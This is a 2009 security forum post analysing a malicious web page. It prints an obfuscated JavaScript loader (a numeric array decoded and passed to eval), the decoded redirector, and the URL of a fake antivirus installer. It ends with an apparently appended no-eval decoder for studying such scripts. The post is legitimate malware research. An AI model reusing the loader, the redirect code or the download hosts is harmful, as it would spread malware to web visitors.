Author Topic: golkis.dnip.net  (Read 2326 times)

April 04, 2009, 02:48:10 am
MysteryFCM

golkis.dnip.net/online-j49/yornt.html

Relevant code from the source (the following script appears just above the DOCTYPE declaration):

Code:
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://golkis.dnip.net/online-j49/yornt.html
Server IP: 78.46.92.150 [ server8.bplaced.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 04 April 2009
Time: 03:41:25:41
*****************************************************************
<script src="uenxfd.js"></script>
<script>aqkgij('yimahira');
</script>

The .js file contains:

Code:
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://golkis.dnip.net/online-j49/uenxfd.js
Server IP: 78.46.92.150 [ server8.bplaced.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 04 April 2009
Time: 03:42:03:42
*****************************************************************
HTTP/1.1 200 OK
Date: Sat, 04 Apr 2009 02:42:02 GMT
Server: Apache/2.2
Last-Modified: Thu, 02 Apr 2009 10:39:41 GMT
ETag: "236288c-7fe-466900caf9540"
Accept-Ranges: bytes
Content-Length: 2046
Vary: Accept-Encoding
Content-Type: application/javascript

var str=["2300", "2299", "2299", "2299", "2408", "2387", "2404", "2322", "2402", "2401", "2408", "2351", "2338", "2349", "2300", "2299", "2299", "2299", "2392", "2407", "2400", "2389", "2406", "2395", "2401", "2400", "2322", "2387", "2403", "2397", "2393", "2395", "2396", "2330", "2403", "2407", "2391", "2404", "2411", "2331", "2413", "2300", "2299", "2299", "2299", "2299", "2395", "2392", "2322", "2330", "2402", "2401", "2408", "2351", "2351", "2338", "2331", "2413", "2402", "2401", "2408", "2351", "2339", "2349", "2322", "2405", "2391", "2406", "2374", "2395", "2399", "2391", "2401", "2407", "2406", "2330", "2329", "2387", "2403", "2397", "2393", "2395", "2396", "2330", "2324", "2329", "2333", "2403", "2407", "2391", "2404", "2411", "2333", "2329", "2324", "2331", "2329", "2334", "2322", "2339", "2331", "2349", "2322", "2415", "2322", "2391", "2398", "2405", "2391", "2322", "2413", "2300", "2299", "2299", "2299", "2299", "2409", "2395", "2400", "2390", "2401", "2409", "2336", "2398", "2401", "2389", "2387", "2406", "2395", "2401", "2400", "2351", "2329", "2394", "2406", "2406", "2402", "2348", "2337", "2337", "2393", "2401", "2398", "2397", "2395", "2405", "2385", "2401", "2400", "2398", "2395", "2400", "2391", "2335", "2396", "2342", "2347", "2336", "2399", "2387", "2395", "2400", "2405", "2392", "2395", "2398", "2391", "2336", "2389", "2401", "2399", "2337", "2395", "2400", "2390", "2391", "2410", "2336", "2394", "2406", "2399", "2398", "2353", "2372", "2391", "2392", "2351", "2329", "2333", "2391", "2400", "2389", "2401", "2390", "2391", "2375", "2372", "2363", "2357", "2401", "2399", "2402", "2401", "2400", "2391", "2400", "2406", "2330", "2390", "2401", "2389", "2407", "2399", "2391", "2400", "2406", "2336", "2404", "2391", "2392", "2391", "2404", "2404", "2391", "2404", "2331", "2349", "2300", "2299", "2299", "2299", "2299", "2415", "2300", "2299", "2299", "2299", "2415"];
var temp='';
var red='';
for (i=0; i<str.length; i++){
  red=str[i]-2290;                      // each entry minus 2290 is an ASCII code
  temp=temp+String.fromCharCode(red);   // rebuild the hidden script one character at a time
}
eval(temp);                             // execute the rebuilt script

Which decodes to:

Code:
var pov=0;
function aqkgij(query){
  if (pov==0){pov=1; setTimeout('aqkgij("'+query+'")', 1); } else {
    window.location='http://golkis_online-j49.mainsfile.com/index.html?Ref='+encodeURIComponent(document.referrer);
  }
}

Rather than post the entire contents of index.html, I'll save you some time - it downloads:

http://easyincomeprotection.cn/installer_90001.exe

.. which the source code says is Antivirus Plus (I've not checked it).
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
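The decoding the post walks through (subtract 2290 from every array entry, turn it into a character, then eval the result) can be reproduced without ever running the hidden script. The following is an added analyst-side example, not code from the post or from the captured site: it decodes the array into text for inspection only, and also recovers the offset by brute force for variants that change the constant. The function names are my own; the sample array is the first 41 entries of the array captured in uenxfd.js above.

```javascript
// Added example (not from the post): a no-eval decoder for the numeric-array
// obfuscation shown above. The captured script does String.fromCharCode(n - 2290)
// on every element and eval()s the result; here the text is only returned.

// First 41 entries of the array captured in uenxfd.js (taken from the post).
const sample = ["2300","2299","2299","2299","2408","2387","2404","2322","2402",
  "2401","2408","2351","2338","2349","2300","2299","2299","2299","2392","2407",
  "2400","2389","2406","2395","2401","2400","2322","2387","2403","2397","2393",
  "2395","2396","2330","2403","2407","2391","2404","2411","2331","2413"];

// Decode with a known offset (2290 in the captured sample).
function decodeWithOffset(arr, offset) {
  return arr.map(n => String.fromCharCode(Number(n) - offset)).join("");
}

// Recover the offset when a variant changes the constant: only offsets that map
// every element to tab/newline/CR or printable ASCII are considered, and the one
// whose output contains the most JavaScript keywords wins (null if none scores).
function recoverOffset(arr) {
  const nums = arr.map(Number);
  const lo = Math.min(...nums), hi = Math.max(...nums);
  const keywords = /\b(var|function|if|else|return|window|document|location|setTimeout|eval)\b/g;
  let best = null;
  for (let off = hi - 126; off <= lo - 9; off++) {
    const text = decodeWithOffset(arr, off);
    if (!/^[\t\n\r\x20-\x7e]*$/.test(text)) continue;
    const score = (text.match(keywords) || []).length;
    if (best === null || score > best.score) best = { off, score };
  }
  return best && best.score > 0 ? best.off : null;
}

// Convenience wrapper: returns the recovered offset and the decoded text.
function decodeAuto(arr) {
  const off = recoverOffset(arr);
  return off === null ? null : { offset: off, text: decodeWithOffset(arr, off) };
}

// Stand-alone run under Node: prints the recovered offset and decoded text.
if (typeof require !== "undefined" && require.main === module) {
  const out = decodeAuto(sample);
  console.log("offset:", out.offset);
  console.log(out.text);
}
```

Paste the full array from the captured file in place of `sample` to recover the whole redirector shown in the post.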